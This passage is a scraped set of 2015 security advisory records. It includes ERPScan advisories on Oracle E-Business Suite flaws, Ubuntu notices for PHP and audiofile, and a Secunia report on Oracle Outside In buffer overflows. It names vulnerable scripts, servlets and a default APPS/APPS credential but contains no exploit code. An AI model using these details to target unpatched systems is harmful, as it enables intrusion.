[ERPSCAN-15-025]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nDate published:20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: User Enumeration\r\nImpact: user enumeration, SSRF\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4845\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity None (N)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThere is a script in EBS that is used to connect to the database and\r\ndisplays the connection status. Different connection results can help\r\nan attacker to find existing database accounts.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.2.4\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nDatabase users enumeration\r\nVunerable script: Aoljtest.js\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32656", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32656", "title": "[ERPSCAN-15-025] Oracle E-Business Suite Database user enumeration Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", "CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4851"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-030]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4851\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/oramipp_lpr\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32655", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32655", "title": "[ERPSCAN-15-030] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. (CVE-2015-7803, CVE-2015-7804)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "title": "[USN-2786-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1338"], "description": "Symbolic links and hadlinks vulnerability in log files, privilege escalation.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14720", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14720", "title": "apport security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2787-1\r\nOctober 28, 2015\r\n\r\naudiofile vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\naudiofile could be made to crash or run programs as your login if it\r\nopened a specially crafted file.\r\n\r\nSoftware Description:\r\n- audiofile: Open-source version of the SGI audiofile library\r\n\r\nDetails:\r\n\r\nFabrizio Gennari discovered that audiofile incorrectly handled changing\r\nboth the sample format and the number of channels. If a user or automated\r\nsystem were tricked into processing a specially crafted file, audiofile\r\ncould be made to crash, leading to a denial of service, or possibly execute\r\narbitrary code.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libaudiofile1 0.3.6-2ubuntu0.15.10.1\r\n\r\nUbuntu 15.04:\r\n libaudiofile1 0.3.6-2ubuntu0.15.04.1\r\n\r\nUbuntu 14.04 LTS:\r\n libaudiofile1 0.3.6-2ubuntu0.14.04.1\r\n\r\nUbuntu 12.04 LTS:\r\n libaudiofile1 0.3.3-2ubuntu0.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2787-1\r\n CVE-2015-7747\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.10.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.14.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.3-2ubuntu0.1\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32652", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32652", "title": "[USN-2787-1] audiofile vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], "description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research (now part of Flexera Software) 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1) Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2) Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From remote\r\n\r\n====================================================================== \r\n3) Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS (Denial of Service) and compromise an application using the SDK.\r\n\r\n1) An error in the vstga.dll when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2) An error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4) Solution\r\n\r\nApply update. Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5) Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6) Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research (now part\r\nof Flexera Software).\r\n\r\n======================================================================\r\n\r\n7) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8) About Secunia (now part of Flexera Software)\r\n\r\nIn September 2015, Secunia has been acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9) Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4846"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite SQL injection\r\nAdvisory ID: [ERPSCAN-15-026]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: SQL injection\r\nImpact: SQL injection, RCE\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4846\r\nCVSS Information\r\nCVSS Base Score: 3.6 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) High (H)\r\nAu : Authentication (Level of authentication needed to exploit) Single (S)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThe problem is caused by an SQL injection vulnerability. The code\r\ncomprises an SQL statement that contains strings that can be altered\r\nby an attacker. The manipulated SQL statement can then be used to\r\nretrieve additional data from the database or to modify the data.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3, 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nOne of SQL extensions (afamexts.sql) does not filter user input values\r\nwhich may lead to SQL injection. The only defense mechanism is a\r\npassword for APPS. If an attacker knows the password (for example,\r\ndefault password APPS/APPS), he will be able to exploit SQL injection\r\nwith high privilege.\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage 